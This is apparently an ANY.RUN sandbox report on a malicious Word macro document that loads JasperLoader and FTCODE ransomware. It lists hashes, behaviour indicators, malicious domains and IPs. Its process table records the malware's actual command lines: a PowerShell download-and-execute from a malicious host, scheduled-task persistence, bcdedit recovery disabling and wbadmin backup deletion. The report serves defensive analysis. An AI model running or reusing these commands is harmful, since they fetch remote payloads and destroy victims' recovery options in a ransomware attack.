analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

63d2bbde0402b1625562d7cf0ba43ae6

Full analysis: https://app.any.run/tasks/42784934-f449-4171-8ae1-5e9ed89dbf37
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 07:30:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
jasper
ransomware
ftcode
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Fri Oct 11 18:18:00 2019, Last Saved Time/Date: Fri Oct 11 19:28:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

63D2BBDE0402B1625562D7CF0BA43AE6

SHA1:

57CD43FCA3E7378C4FD271F2F1BA670A7864AC33

SHA256:

56D9519C211ACE4EF59B0AD242686B1C1698290C5747713529B633EFD5FB3F28

SSDEEP:

3072:fvaU+HscWycwdtQNclQdIkIqWDEcAbCGB74/DIk5SH:Ha1shhwoNclQbIqWDEcAmS4rIK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1552)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1552)
    • JASPER was detected

      • powershell.exe (PID: 3896)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3896)
    • Writes to a start menu file

      • powershell.exe (PID: 3896)
    • FTCODE was detected

      • powershell.exe (PID: 3896)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2236)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 3960)
    • Deletes shadow copies

      • cmd.exe (PID: 1944)
      • cmd.exe (PID: 992)
    • Renames files like Ransomware

      • powershell.exe (PID: 3896)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3896)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3896)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 3896)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1552)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1552)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 3896)
    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 3896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Administrator
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 3.0 minutes
CreateDate: 2019:10:11 17:18:00
ModifyDate: 2019:10:11 18:28:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
15
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs #JASPER powershell.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1552"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\63d2bbde0402b1625562d7cf0ba43ae6.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.whisperinghillequestriancenter.com/?need=stafhxt&vid=dpec9&40307'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2236"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 20 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3360"C:\Windows\system32\cmd.exe" /c bcdedit /set tzajxjsy bootstatuspolicy ignoreallfailures C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3960"C:\Windows\system32\cmd.exe" /c bcdedit /set tzajxjsy recoveryenabled no C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1944"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967294
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2452bcdedit /set tzajxjsy bootstatuspolicy ignoreallfailures C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
584"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3956bcdedit /set tzajxjsy recoveryenabled no C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3876"C:\Windows\system32\cmd.exe" /c wbadmin delete backup C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967295
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 977
Read events
1 233
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
41
Text files
15
Unknown types
3

Dropped files

PID
Process
Filename
Type
1552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB7D1.tmp.cvr
MD5:
SHA256:
3896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9E1UZSHBDWH9ELE2Y6CF.temp
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\believefrench.png
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\booktrial.rtf
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\cnetcommand.rtf
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\hairassociates.rtf
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\keywordstogether.rtf
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\medicalunder.jpg
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\resourcereading.rtf
MD5:
SHA256:
3896powershell.exeC:\Users\admin\Desktop\seasonboth.png
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3896
powershell.exe
GET
200
185.189.151.22:80
http://jes.whisperinghillequestriancenter.com/?need=stafhxt&vid=dpec9&40307
CH
text
9.33 Kb
malicious
3896
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
malicious
3896
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
3896
powershell.exe
POST
200
185.158.249.55:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3896
powershell.exe
185.189.151.22:80
jes.whisperinghillequestriancenter.com
SOFTplus Entwicklungen GmbH
CH
malicious
3896
powershell.exe
185.158.249.55:80
connect.contractorquote.info
easystores GmbH
NL
malicious

DNS requests

Domain
IP
Reputation
jes.whisperinghillequestriancenter.com
  • 185.189.151.22
malicious
abby.abbyehughes.com
  • 185.189.151.22
malicious
connect.contractorquote.info
  • 185.158.249.55
malicious

Threats

PID
Process
Class
Message
3896
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] JasperLoader Obfuscation
3896
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Ransom.PowerShell.Ftcode.A!MSR
2 ETPRO signatures available at the full report
No debug info